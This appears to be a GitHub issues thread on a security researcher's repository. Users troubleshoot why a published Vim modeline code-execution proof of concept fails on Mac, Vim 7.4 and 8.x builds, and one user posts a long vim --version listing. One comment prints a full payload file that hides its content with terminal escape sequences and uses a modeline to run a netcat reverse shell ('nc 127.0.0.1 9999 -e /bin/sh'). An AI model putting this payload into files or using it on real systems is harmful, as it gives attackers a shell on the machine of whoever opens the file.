numirias / security
Some of my security stuff and vulnerabilities. Nothing advanced. More to come.
Home Page: https://twitter.com/rawsec
Hi,
The modeline is by default enabled on Mac OS X. However, both payloads stated in your advisory are not working for Mac with an outdated Vim version. They work fine on Ubuntu. Is it possible that the implementation of Vim is different? Can you take a look at what happened?
Hi,
I realize that the function assert_fails was added in version 8; does that mean Vim 7.4 is not affected by this vulnerability, or how could I construct a PoC on Vim 7.4?
Thanks
I got this
cat shell.txt
\x1b[?7l\x1bSNothing here.\x1b:silent! w | call system('nohup nc 127.0.0.1 9999 -e /bin/sh &') | redraw! | file | silent! # " vim: set fen fdm=expr fde=assert_fails('set\ fde=x\ \|\ source\!\ \%') fdl=0: \x16\x1b[1G\x16\x1b[KNothing here."\x16\x1b[D \n
vim shell.txt
"shell.txt" 1L, 264C
Error detected while processing modelines:
line 1:
E518: Unknown option: \|\
Hi,
I would like to confirm this PoC with Vim version 8.0.1453, which is a vulnerable version,
but it doesn't work for me.
I set "modeline" to be activated in /etc/vim/vimrc (I tested two things: set modeline and :set modeline).
I checked with the command "set modeline?";
modeline was activated properly...
and then I opened poc.txt with Vim.
Nothing happened. Do you know what the problem is??
The test PoC is like below
:
Hello,
I'm trying the PoC on a Vim 8.1.0648-r1 but it doesn't work.
I'm not using Vim and have barely any knowledge of this editor, but here is what I have checked so far:
By default, :set modelines? shows nomodeline. I created a .vimrc with the following content:
set modelines=1
set modeline
and ran it like
vim -u .vimrc and
:set modelines? shows modeline. I saved the file poc.txt found in this repo and opened it with vim -u .vimrc poc.txt, but it didn't return a uname -a and instead displayed the content of the file.
vim --version
VIM - Vi IMproved 8.1 (2018 May 18, compiled May 10 2019 13:57:46)
Included patches: 1-648
Modified by Gentoo-8.1.0648-r1
Compiled by portage@localhost
Tiny version without GUI. Features included (+) or not (-):
+acl -extra_search -mouse_sgr -tcl
-arabic -farsi -mouse_sysmouse -termguicolors
+autocmd -file_in_path -mouse_urxvt -terminal
-autochdir -find_in_path -mouse_xterm +terminfo
-autoservername -float -multi_byte -termresponse
-balloon_eval -folding -multi_lang -textobjects
-balloon_eval_term -footer -mzscheme -textprop
-browse +fork() -netbeans_intg -timers
+builtin_terms -gettext -num64 -title
-byte_offset -hangul_input -packages -toolbar
-channel -iconv -path_extra -user_commands
-cindent -insert_expand -perl -vartabs
-clientserver -job -persistent_undo +vertsplit
-clipboard -jumplist -printer -virtualedit
-cmdline_compl -keymap -profile +visual
-cmdline_hist -lambda -python -visualextra
-cmdline_info -langmap -python3 -viminfo
-comments -libcall -quickfix +vreplace
-conceal -linebreak -reltime +wildignore
-cryptv -lispindent -rightleft -wildmenu
-cscope +listcmds -ruby +windows
+cursorbind -localmap +scrollbind +writebackup
-cursorshape -lua -signs -X11
-dialog -menu -smartindent -xfontset
-diff -mksession -startuptime -xim
-digraphs -modify_fname -statusline -xpm
-dnd -mouse -sun_workshop -xsmp
-ebcdic -mouse_dec -syntax -xterm_clipboard
-emacs_tags -mouse_gpm +tag_binary -xterm_save
-eval -mouse_jsbterm -tag_old_static
+ex_extra -mouse_netterm -tag_any_white
system vimrc file: "/etc/vim/vimrc"
user vimrc file: "$HOME/.vimrc"
2nd user vimrc file: "~/.vim/vimrc"
user exrc file: "$HOME/.exrc"
defaults file: "$VIMRUNTIME/defaults.vim"
fall-back for $VIM: "/usr/share/vim"
Compilation: x86_64-gentoo-linux-musl-gcc -c -I. -Iproto -DHAVE_CONFIG_H -O2 -pipe -U_FORTIFY_SOURCE -D_FORTIFY_SOURCE=1
Linking: x86_64-gentoo-linux-musl-gcc -Wl,-O1 -L/usr/local/lib -Wl,--as-needed -o vim -lm -lncurses -lelf
I suppose one of those features must be enabled in order to make the PoC work, but I haven't found yet which one...
Thanks